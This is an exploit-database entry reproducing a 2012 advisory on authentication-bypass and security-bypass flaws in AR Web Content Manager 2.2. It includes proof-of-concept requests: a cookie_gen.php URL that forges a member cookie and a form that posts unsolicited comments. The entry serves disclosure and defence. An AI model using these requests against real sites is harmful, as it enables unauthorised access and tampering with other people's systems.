AR Web Content Manager (AWCM) – ‘cookie_gen.php’ Arbitrary Cookie Generation

  • 作者: Sooel Son
    日期: 2012-11-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38015/
  • source: https://www.securityfocus.com/bid/56465/info
    
    AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
    
    Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
    
    AWCM 2.2 is vulnerable; other versions may also be affected. 
    
    Authentication Bypass:
    
    http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
    ex) http://targethost/awcm/cookie_gen.php?
    name=awcm_member&content=123456
    
    Security Bypass:
    
    [form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
    method=\"post\"]
    [input type=\"hidden\" name=\"coment\" value=\'insert
    uninvited comments 2\' /]
    [input type=\"submit\" value=\"Submit\"]
    </form>